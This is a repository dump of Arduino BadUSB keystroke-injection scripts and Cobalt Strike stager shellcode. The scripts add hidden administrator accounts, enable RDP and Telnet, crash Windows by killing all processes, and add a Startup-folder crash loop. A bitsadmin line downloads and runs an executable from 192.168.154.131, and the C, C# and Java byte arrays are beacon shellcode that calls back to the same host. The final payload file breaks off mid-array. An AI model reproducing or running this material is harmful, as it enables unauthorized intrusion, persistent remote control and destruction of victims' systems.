[
  {
    "path": "AddUser_StartService/AddUser_Enable3389(tools).ino",
    "content": "void setup(){\n  Keyboard.begin();\n  delay(3000);\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(500); \n  Keyboard.press('r');//r键 \n  delay(500); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  delay(500); \n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  Keyboard.println(\"POWERSHELL.EXE -C START-PROCESS POWERSHELL -VERB RUNAS\");\n  Keyboard.println();\n  delay(1000);\n  Keyboard.press(KEY_LEFT_ALT);\n  Keyboard.print('y');\n  Keyboard.release(KEY_LEFT_ALT);\n  delay(500);\n  Keyboard.println(\"CMD\");\n  delay(50);\n  Keyboard.println(\"CMD /C NET USER ADMIN ADMIN /ADD&NET LOCALGROUP ADMINISTRATORS ADMIN /ADD\");\n  delay(50)\n  Keyboard.println(\"ECHO wINDOWS rEGISTRY eDITOR vERSION 5.00>3389.REG&&ECHO [hkey_local_machine\\\\system\\\\cURRENTcONTROLsET\\\\cONTROL\\\\tERMINAL sERVER]>>3389.REG&&ECHO \\\"FdENYtscCONNECTIONS\\\"=DWORD:00000000>>3389.REG&&ECHO [hkey_local_machine\\\\system\\\\cURRENTcONTROLsET\\\\cONTROL\\\\tERMINAL sERVER\\\\wDS\\\\RDPWD\\\\tDS\\\\TCP]>>3389.REG&&ECHO \\\"pORTnUMBER\\\"=DWORD:00000D3D>>3389.REG&&ECHO [hkey_local_machine\\\\system\\\\cURRENTcONTROLsET\\\\cONTROL\\\\tERMINAL sERVER\\\\wINsTATIONS\\\\rdp-tCP]>>3389.REG&&ECHO \\\"pORTnUMBER\\\"=DWORD:00000D3D>>3389.REG\");\n  delay(100);\n  Keyboard.println(\"REGEDIT /S 3389.REG&&DEL 3389.REG&&EXIT\");\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  Keyboard.end();\n}\n\nvoid loop(){\n}\n"
  },
  {
    "path": "AddUser_StartService/AddUser_EnableFTP(tools).ino",
    "content": "void setup() {\n  Keyboard.begin();//开始键盘通讯 \n  delay(5000);//延时\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(500); \n  Keyboard.press('r');//r键 \n  delay(500); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  delay(500);\n  Keyboard.println(\"CMD\");\n  Keyboard.println();\n  delay(500);\n  Keyboard.println(\"COLOR A&&CLS\");\n  Keyboard.println(\"NET USER 123 123 /ADD\");\n  delay(500);\n  Keyboard.println(\"NET LOCALGROUP ADMINISTRATORS 123 /ADD&&REG ADD \\\"hkey_local_machine\\\\software\\\\mICROSOFT\\\\wINDOWS nt\\\\cURRENTvERSION\\\\wINLOGON\\\\sPECIALaCCOUNTS\\\\uSERlIST\\\" /V 123 /D 0 /T reg_dword /F&&REG ADD \\\"hkey_local_machine\\\\software\\\\microsoft\\\\tELNETsERVER\\\\1.0\\\" /V ntlm /D 0 /T reg_doword/f&&reg add \\\"hklm\\\\system\\\\cURRENTcONTROLsET\\\\cONTRAL\\\\lSA\\\" /V \\\"FORCEGUEST\\\" /T reg_dword /D 0 /F\");\n  delay(1000);\n  Keyboard.println(\"SC CONFIG TLNTSVR START= AUTO\");\n  delay(500);\n  Keyboard.println(\"NET START TELNET\");\n  delay(500);\n  Keyboard.println(\"CLS&&ECHO hACKED fINISH\");\n    Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  Keyboard.end();\n}\nvoid loop() {\n}\n"
  },
  {
    "path": "BlueScreen/BlueScreen1(DOS).ino",
    "content": "//CMD蓝屏代码\nvoid setup() {//初始化\n  Keyboard.begin();//开始键盘通讯 \n  delay(5000);//延时\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(500); \n  Keyboard.press('r');//r键 \n  delay(500); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  delay(500); \n  Keyboard.println(\"cmd.exe /T:01 /K mode CON: COLS=16 LINES=1&reg delete HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\RunMRU /f&cmd /c for /f %I in ('wmic process get Name')do (wmic process where Name=\\\"%I\\\" delete)\");\n  Keyboard.end();//结束键盘通讯 \n}\nvoid loop()//循环\n{\n}\n"
  },
  {
    "path": "BlueScreen/BlueScreen2(DOS).ino",
    "content": "void setup() {//初始化\n  Keyboard.begin();//开始键盘通讯 \n  delay(20000);//延时\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(500); \n  Keyboard.press('r');//r键 \n  delay(500); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  delay(500); \n  Keyboard.println(\"POWERSHELL -NOP -W HIDDEN -C \\\"sTART-pROCESS -fILEpATH CMD.EXE \\' /C FOR /F %i IN(''WMIC PROCESS GET nAME\\'\\')DO (WMIC PROCESS WHERE nAME=\\\"%i\\\" DELETE)\\' -vERB RUNAS\\\"\");\n  Keyboard.println();\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  Keyboard.end();//结束键盘通讯 \n}\nvoid loop()//循环\n{\n  //bypass uac   绕过UAC 这一段不会用的不要用,否则后果自负\n  //Keyboard.press(KEY_LEFT_ALT);\n  //Keyboard.print('y');\n  //Keyboard.release(KEY_LEFT_ALT);\n}\n"
  },
  {
    "path": "BlueScreen/BlueScreen3(DOS).ino",
    "content": "void setup() {//初始化\n  Keyboard.begin();//开始键盘通讯 \n  delay(5000);//延时\n   Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(500); \n  Keyboard.press('r');//r键 \n  delay(500); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  delay(500); \n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  Keyboard.println(\"CMD /C FOR /F %i IN ('WMIC PROCESS GET nAME')DO (WMIC PROCESS WHERE nAME=\\\"%i\\\" DELETE)\");\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  Keyboard.end();//结束键盘通讯 \n}\nvoid loop()//循环\n{\n}\n"
  },
  {
    "path": "BlueScreen/BlueScreen_xp_win7(DOS).ino",
    "content": "#include<Keyboard.h>\n\nvoid setup() \n{\n  //初始化\n  Keyboard.begin();//开始键盘通讯 \n  delay(5000);//延时\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(500); \n  Keyboard.press('r');//r键 \n  delay(500); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  delay(500); \n  Keyboard.println(\"CMD /C START /MIN CMD /C REG DELETE hkcu\\\\sOFTWARE\\\\mICROSOFT\\\\wINDOWS\\\\cURRENTvERSION\\\\eXPLORER\\\\rUNmru /F&CMD /C START /MIN CMD /C NTSD -C Q -PN WINLOGON.EXE 1>NUL 2>NUL&TASKKILL /F /IM WININIT.EXE 2>NUL\");\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  Keyboard.end();//结束键盘通讯 \n}\n\nvoid loop()//循环\n{\n}"
  },
  {
    "path": "BlueScreen/DelayedBlueScreen (DOS).ino",
    "content": "void setup() {//初始化\n  Keyboard.begin();//开始键盘通讯 \n  delay(5000);//延时\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(500); \n  Keyboard.press('r');//r键 \n  delay(500); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  delay(500); \n  Keyboard.println(\"cmd.exe /k reg delete HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\RunMRU /f\");\n  delay(500);\n  Keyboard.println(\"echo.if \\\"%1\\\" == \\\"h\\\" goto begin>c:\\\\1.bat&echo.mshta vbscript:createobject(\\\"wscript.shell\\\").run(\\\"%~nx0 h\\\",0)(window.close)^&^&exit>>c:\\\\1.bat&echo.:begin>>c:\\\\1.bat&echo.ping ^-n 3 127.1^>nul^&for /f %%I in ('wmic process get Name')do (wmic process where Name=\\\"%%I\\\" delete)^>c:\\\\1.vbs^&c:\\\\1.vbs>>c:\\\\1.bat&exit\");\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(500); \n  Keyboard.press('r');//r键 \n  delay(500); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  delay(500); \n  Keyboard.println(\"c:\\\\1.bat\");\n  Keyboard.end();//结束键盘通讯 \n}\nvoid loop()//循环\n{\n}\n"
  },
  {
    "path": "BlueScreen/RegistryWriteBlueScreen (DOS).ino",
    "content": "void setup() {//初始化\n  Keyboard.begin();//开始键盘通讯 \n  delay(5000);//延时\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(500); \n  Keyboard.press('r');//r键 \n  delay(500); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  delay(500); \n  Keyboard.println(\"CMD /C CD %USERPROFILE%\\\\aPPdATA\\\\rOAMING\\\\mICROSOFT\\\\wINDOWS\\\\sTART mENU\\\\pROGRAMS\\\\sTARTUP&ECHO FOR /F %%i IN (\\'WMIC PROCESS GET NAME\\')DO (WMIC PROCESS WHERE nAME=\\\"%%I\\\" DELETE)>SYSTEM.BAT&SHUTDOWN -R -F -T 0\");\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  Keyboard.end();//结束键盘通讯 \n}\nvoid loop()//循环\n{\n}\n"
  },
  {
    "path": "BlueScreen/RegistryWriteBlueScreenGeneralUse (DOS).ino",
    "content": "void setup() {//初始化\n  Keyboard.begin();//开始键盘通讯 \n  delay(5000);//延时\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(500); \n  Keyboard.press('r');//r键 \n  delay(500); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  delay(500); \n  Keyboard.println(\"CMD /C START /MIN CMD /C REG DELETE hkcu\\\\sOFTWARE\\\\mICROSOFT\\\\wINDOWS\\\\cURRENTvERSION\\\\eXPLORER\\\\rUNmru /F&CMD /C START /MIN CMD /C NTSD -C Q -PN WINLOGON.EXE 1>NUL 2>NUL&TASKKILL /F /IM WININIT.EXE 2>NUL\");\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  Keyboard.end();//结束键盘通讯 \n}\nvoid loop()//循环\n{\n}\n\n\n"
  },
  {
    "path": "CobaltStrike_Trojanlinkage/Bitsadmin_TrojanExecution (LinkageWithCS).ino",
    "content": "#include<Keyboard.h>\n\nvoid setup() {//初始化\n  Keyboard.begin();//开始键盘通讯 \n  delay(5000);//延时\n  Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题\n  Keyboard.release(KEY_CAPS_LOCK); //释放大写键\n  delay(200);\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(200); \n  Keyboard.press('r');//r键 \n  delay(200); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  Keyboard.println(\"cmd.exe\");\n  delay(200); \n  Keyboard.println(\"cmd.exe /c bitsadmin /transfer 270c http://192.168.154.131:80/b %APPDATA%\\270c.exe&%APPDATA%\\270c.exe&del %APPDATA%\\270c.exe\");  //访问Web Delivery-bitsadmin，恶意网址按照实际更改\n  delay(200); \n  Keyboard.end();//结束键盘通讯 \n}\nvoid loop()//循环\n{\n}"
  },
  {
    "path": "CobaltStrike_Trojanlinkage/CobaltStrike_Payload/payload.c",
    "content": "/* length: 800 bytes */\nunsigned char buf[] = \"\\xfc\\xe8\\x89\\x00\\x00\\x00\\x60\\x89\\xe5\\x31\\xd2\\x64\\x8b\\x52\\x30\\x8b\\x52\\x0c\\x8b\\x52\\x14\\x8b\\x72\\x28\\x0f\\xb7\\x4a\\x26\\x31\\xff\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\xc1\\xcf\\x0d\\x01\\xc7\\xe2\\xf0\\x52\\x57\\x8b\\x52\\x10\\x8b\\x42\\x3c\\x01\\xd0\\x8b\\x40\\x78\\x85\\xc0\\x74\\x4a\\x01\\xd0\\x50\\x8b\\x48\\x18\\x8b\\x58\\x20\\x01\\xd3\\xe3\\x3c\\x49\\x8b\\x34\\x8b\\x01\\xd6\\x31\\xff\\x31\\xc0\\xac\\xc1\\xcf\\x0d\\x01\\xc7\\x38\\xe0\\x75\\xf4\\x03\\x7d\\xf8\\x3b\\x7d\\x24\\x75\\xe2\\x58\\x8b\\x58\\x24\\x01\\xd3\\x66\\x8b\\x0c\\x4b\\x8b\\x58\\x1c\\x01\\xd3\\x8b\\x04\\x8b\\x01\\xd0\\x89\\x44\\x24\\x24\\x5b\\x5b\\x61\\x59\\x5a\\x51\\xff\\xe0\\x58\\x5f\\x5a\\x8b\\x12\\xeb\\x86\\x5d\\x68\\x6e\\x65\\x74\\x00\\x68\\x77\\x69\\x6e\\x69\\x54\\x68\\x4c\\x77\\x26\\x07\\xff\\xd5\\x31\\xff\\x57\\x57\\x57\\x57\\x57\\x68\\x3a\\x56\\x79\\xa7\\xff\\xd5\\xe9\\x84\\x00\\x00\\x00\\x5b\\x31\\xc9\\x51\\x51\\x6a\\x03\\x51\\x51\\x68\\x24\\x05\\x00\\x00\\x53\\x50\\x68\\x57\\x89\\x9f\\xc6\\xff\\xd5\\xeb\\x70\\x5b\\x31\\xd2\\x52\\x68\\x00\\x02\\x60\\x84\\x52\\x52\\x52\\x53\\x52\\x50\\x68\\xeb\\x55\\x2e\\x3b\\xff\\xd5\\x89\\xc6\\x83\\xc3\\x50\\x31\\xff\\x57\\x57\\x6a\\xff\\x53\\x56\\x68\\x2d\\x06\\x18\\x7b\\xff\\xd5\\x85\\xc0\\x0f\\x84\\xc3\\x01\\x00\\x00\\x31\\xff\\x85\\xf6\\x74\\x04\\x89\\xf9\\xeb\\x09\\x68\\xaa\\xc5\\xe2\\x5d\\xff\\xd5\\x89\\xc1\\x68\\x45\\x21\\x5e\\x31\\xff\\xd5\\x31\\xff\\x57\\x6a\\x07\\x51\\x56\\x50\\x68\\xb7\\x57\\xe0\\x0b\\xff\\xd5\\xbf\\x00\\x2f\\x00\\x00\\x39\\xc7\\x74\\xb7\\x31\\xff\\xe9\\x91\\x01\\x00\\x00\\xe9\\xc9\\x01\\x00\\x00\\xe8\\x8b\\xff\\xff\\xff\\x2f\\x77\\x4c\\x61\\x38\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f
\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x00\\x55\\x73\\x65\\x72\\x2d\\x41\\x67\\x65\\x6e\\x74\\x3a\\x20\\x4d\\x6f\\x7a\\x69\\x6c\\x6c\\x61\\x2f\\x35\\x2e\\x30\\x20\\x28\\x63\\x6f\\x6d\\x70\\x61\\x74\\x69\\x62\\x6c\\x65\\x3b\\x20\\x4d\\x53\\x49\\x45\\x20\\x31\\x30\\x2e\\x30\\x3b\\x20\\x57\\x69\\x6e\\x64\\x6f\\x77\\x73\\x20\\x4e\\x54\\x20\\x36\\x2e\\x32\\x3b\\x20\\x57\\x69\\x6e\\x36\\x34\\x3b\\x20\\x78\\x36\\x34\\x3b\\x20\\x54\\x72\\x69\\x64\\x65\\x6e\\x74\\x2f\\x36\\x2e\\x30\\x29\\x0d\\x0a\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x00\\x68\\xf0\\xb5\\xa2\\x56\\xff\\xd5\\x6a\\x40\\x68\\x00\\x10\\x00\\x00\\x68\\x00\\x00\\x40\\x00\\x57\\x68\\x58\\xa4\\x53\\xe5\\xff\\xd5\\x93\\xb9\\x00\\x00\\x00\\x00\\x01\\xd9\\x51\\x53\\x89\\xe7\\x57\\x68\\x00\\x20\\x00\\x00\\x53\\x56\\x68\\x12\\x96\\x89\\xe2\\xff\\xd5\\x85\\xc0\\x74\\xc6\\x8b\\x07\\x01\\xc3\\x85\\xc0\\x75\\xe5\\x58\\xc3\\xe8\\xa9\\xfd\\xff\\xff\\x31\\x39\\x32\\x2e\\x31\\x36\\x38
\\x2e\\x31\\x35\\x34\\x2e\\x31\\x33\\x31\\x00\\x00\\x00\\x00\\x00\";\n"
  },
  {
    "path": "CobaltStrike_Trojanlinkage/CobaltStrike_Payload/payload.cs",
    "content": "/* length: 800 bytes */\nbyte[] buf = new byte[800] { 0xfc, 0xe8, 0x89, 0x00, 0x00, 0x00, 0x60, 0x89, 0xe5, 0x31, 0xd2, 0x64, 0x8b, 0x52, 0x30, 0x8b, 0x52, 0x0c, 0x8b, 0x52, 0x14, 0x8b, 0x72, 0x28, 0x0f, 0xb7, 0x4a, 0x26, 0x31, 0xff, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0xe2, 0xf0, 0x52, 0x57, 0x8b, 0x52, 0x10, 0x8b, 0x42, 0x3c, 0x01, 0xd0, 0x8b, 0x40, 0x78, 0x85, 0xc0, 0x74, 0x4a, 0x01, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x8b, 0x58, 0x20, 0x01, 0xd3, 0xe3, 0x3c, 0x49, 0x8b, 0x34, 0x8b, 0x01, 0xd6, 0x31, 0xff, 0x31, 0xc0, 0xac, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0x38, 0xe0, 0x75, 0xf4, 0x03, 0x7d, 0xf8, 0x3b, 0x7d, 0x24, 0x75, 0xe2, 0x58, 0x8b, 0x58, 0x24, 0x01, 0xd3, 0x66, 0x8b, 0x0c, 0x4b, 0x8b, 0x58, 0x1c, 0x01, 0xd3, 0x8b, 0x04, 0x8b, 0x01, 0xd0, 0x89, 0x44, 0x24, 0x24, 0x5b, 0x5b, 0x61, 0x59, 0x5a, 0x51, 0xff, 0xe0, 0x58, 0x5f, 0x5a, 0x8b, 0x12, 0xeb, 0x86, 0x5d, 0x68, 0x6e, 0x65, 0x74, 0x00, 0x68, 0x77, 0x69, 0x6e, 0x69, 0x54, 0x68, 0x4c, 0x77, 0x26, 0x07, 0xff, 0xd5, 0x31, 0xff, 0x57, 0x57, 0x57, 0x57, 0x57, 0x68, 0x3a, 0x56, 0x79, 0xa7, 0xff, 0xd5, 0xe9, 0x84, 0x00, 0x00, 0x00, 0x5b, 0x31, 0xc9, 0x51, 0x51, 0x6a, 0x03, 0x51, 0x51, 0x68, 0x24, 0x05, 0x00, 0x00, 0x53, 0x50, 0x68, 0x57, 0x89, 0x9f, 0xc6, 0xff, 0xd5, 0xeb, 0x70, 0x5b, 0x31, 0xd2, 0x52, 0x68, 0x00, 0x02, 0x60, 0x84, 0x52, 0x52, 0x52, 0x53, 0x52, 0x50, 0x68, 0xeb, 0x55, 0x2e, 0x3b, 0xff, 0xd5, 0x89, 0xc6, 0x83, 0xc3, 0x50, 0x31, 0xff, 0x57, 0x57, 0x6a, 0xff, 0x53, 0x56, 0x68, 0x2d, 0x06, 0x18, 0x7b, 0xff, 0xd5, 0x85, 0xc0, 0x0f, 0x84, 0xc3, 0x01, 0x00, 0x00, 0x31, 0xff, 0x85, 0xf6, 0x74, 0x04, 0x89, 0xf9, 0xeb, 0x09, 0x68, 0xaa, 0xc5, 0xe2, 0x5d, 0xff, 0xd5, 0x89, 0xc1, 0x68, 0x45, 0x21, 0x5e, 0x31, 0xff, 0xd5, 0x31, 0xff, 0x57, 0x6a, 0x07, 0x51, 0x56, 0x50, 0x68, 0xb7, 0x57, 0xe0, 0x0b, 0xff, 0xd5, 0xbf, 0x00, 0x2f, 0x00, 0x00, 0x39, 0xc7, 0x74, 0xb7, 0x31, 0xff, 0xe9, 0x91, 0x01, 0x00, 0x00, 0xe9, 0xc9, 0x01, 0x00, 0x00, 0xe8, 0x8b, 0xff, 
0xff, 0xff, 0x2f, 0x74, 0x4f, 0x57, 0x42, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x00, 0x55, 0x73, 0x65, 0x72, 0x2d, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x3a, 0x20, 0x4d, 0x6f, 0x7a, 0x69, 0x6c, 0x6c, 0x61, 0x2f, 0x35, 0x2e, 0x30, 0x20, 0x28, 0x63, 0x6f, 0x6d, 0x70, 0x61, 0x74, 0x69, 0x62, 0x6c, 0x65, 0x3b, 0x20, 0x4d, 0x53, 0x49, 0x45, 0x20, 0x31, 0x30, 0x2e, 0x30, 0x3b, 0x20, 0x57, 0x69, 0x6e, 0x64, 0x6f, 0x77, 0x73, 0x20, 0x4e, 0x54, 0x20, 0x36, 0x2e, 0x32, 0x3b, 0x20, 0x57, 0x69, 0x6e, 0x36, 0x34, 0x3b, 0x20, 0x78, 0x36, 0x34, 0x3b, 0x20, 0x54, 0x72, 0x69, 0x64, 0x65, 0x6e, 0x74, 0x2f, 0x36, 0x2e, 0x30, 0x29, 0x0d, 0x0a, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 
0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x00, 0x68, 0xf0, 0xb5, 0xa2, 0x56, 0xff, 0xd5, 0x6a, 0x40, 0x68, 0x00, 0x10, 0x00, 0x00, 0x68, 0x00, 0x00, 0x40, 0x00, 0x57, 0x68, 0x58, 0xa4, 0x53, 0xe5, 0xff, 0xd5, 0x93, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x01, 0xd9, 0x51, 0x53, 0x89, 0xe7, 0x57, 0x68, 0x00, 0x20, 0x00, 0x00, 0x53, 0x56, 0x68, 0x12, 0x96, 0x89, 0xe2, 0xff, 0xd5, 0x85, 0xc0, 0x74, 0xc6, 0x8b, 0x07, 0x01, 0xc3, 0x85, 0xc0, 0x75, 0xe5, 0x58, 0xc3, 0xe8, 0xa9, 0xfd, 0xff, 0xff, 0x31, 0x39, 0x32, 0x2e, 0x31, 0x36, 0x38, 0x2e, 0x31, 0x35, 0x34, 0x2e, 0x31, 0x33, 0x31, 0x00, 0x00, 0x00, 0x00, 0x00 };\n"
  },
  {
    "path": "CobaltStrike_Trojanlinkage/CobaltStrike_Payload/payload.java",
    "content": "/* length: 800 bytes */\nbyte buf[] = new byte[] { 0xfc, 0xe8, 0x89, 0x00, 0x00, 0x00, 0x60, 0x89, 0xe5, 0x31, 0xd2, 0x64, 0x8b, 0x52, 0x30, 0x8b, 0x52, 0x0c, 0x8b, 0x52, 0x14, 0x8b, 0x72, 0x28, 0x0f, 0xb7, 0x4a, 0x26, 0x31, 0xff, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0xe2, 0xf0, 0x52, 0x57, 0x8b, 0x52, 0x10, 0x8b, 0x42, 0x3c, 0x01, 0xd0, 0x8b, 0x40, 0x78, 0x85, 0xc0, 0x74, 0x4a, 0x01, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x8b, 0x58, 0x20, 0x01, 0xd3, 0xe3, 0x3c, 0x49, 0x8b, 0x34, 0x8b, 0x01, 0xd6, 0x31, 0xff, 0x31, 0xc0, 0xac, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0x38, 0xe0, 0x75, 0xf4, 0x03, 0x7d, 0xf8, 0x3b, 0x7d, 0x24, 0x75, 0xe2, 0x58, 0x8b, 0x58, 0x24, 0x01, 0xd3, 0x66, 0x8b, 0x0c, 0x4b, 0x8b, 0x58, 0x1c, 0x01, 0xd3, 0x8b, 0x04, 0x8b, 0x01, 0xd0, 0x89, 0x44, 0x24, 0x24, 0x5b, 0x5b, 0x61, 0x59, 0x5a, 0x51, 0xff, 0xe0, 0x58, 0x5f, 0x5a, 0x8b, 0x12, 0xeb, 0x86, 0x5d, 0x68, 0x6e, 0x65, 0x74, 0x00, 0x68, 0x77, 0x69, 0x6e, 0x69, 0x54, 0x68, 0x4c, 0x77, 0x26, 0x07, 0xff, 